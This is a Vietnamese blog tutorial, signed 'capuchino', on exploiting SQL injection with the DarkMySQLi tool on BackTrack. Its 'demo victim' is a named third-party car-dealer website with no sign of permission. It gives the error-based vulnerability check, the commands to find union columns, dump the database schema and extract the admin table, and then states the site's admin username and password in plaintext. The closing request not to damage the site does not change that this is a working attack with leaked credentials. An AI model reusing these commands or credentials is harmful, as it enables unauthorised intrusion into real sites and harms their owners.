Thứ Sáu, 4 tháng 1, 2013

Sqli với backtrack dùng bộ công cụ Darkmysqli

Victim demo :http://autohoabinh.com/?page=products_detail&id=293&catid=11
Khi ta check http://autohoabinh.com/?page=products_detail&id=293&catid=11"
thì nhận đc là 


--->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/athb/domains/autohoabinh.com/public_html/templates/products_detail.htmon line 62

dòng này cho thấy có lỗi


RỒi giờ ta vào terminal của backtrack
 cd /pentest/web/darkmysqli/



tiếp 
python DarkMySQLi.py -u "http://autohoabinh.com/?page=products_detail&id=293&catid=11" --findcol

chú ý trong câu lệnh mình để dấu nháy "" là để nó ko tách link ra,vì trong link có kí tự đặc biệt là


sau khi chạy ta nhận đc là

trong đó ta chú ý đến 2 dòng sau đây
[!] SQLi URL: http://autohoabinh.com/?page=products_detail&id=293&catid=11+AND+1=2+UNION+SELECT+1,2--
[!] darkMySQLi URL: http://autohoabinh.com/?page=products_detail&id=293&catid=11+AND+1=2+UNION+SELECT+1,darkc0de--


Chạy tiếp như sau 


python DarkMySQLi.py -u "http://autohoabinh.com/?page=products_detail&id=293&catid=11+AND+1=2+UNION+SELECT+1,darkc0de" --full

dòng màu vàng lấy đc từ trên đấy.

ta nhận đc 



tiếp tục lấy id,name,pass ở table tbl_admin và database athb_db như sau

python DarkMySQLi.py -u "http://autohoabinh.com/?page=products_detail&id=293&catid=11+AND+1=2+UNION+SELECT+1,darkc0de" --dump -D athb_db -T tbl_admin -C id,name,pass

ta nhận đc 

vậy user là admin pass là dangphihung nhé
mọi người lấy tham khảo đừng phá site người ta.

tut by capuchino




Không có nhận xét nào:

Đăng nhận xét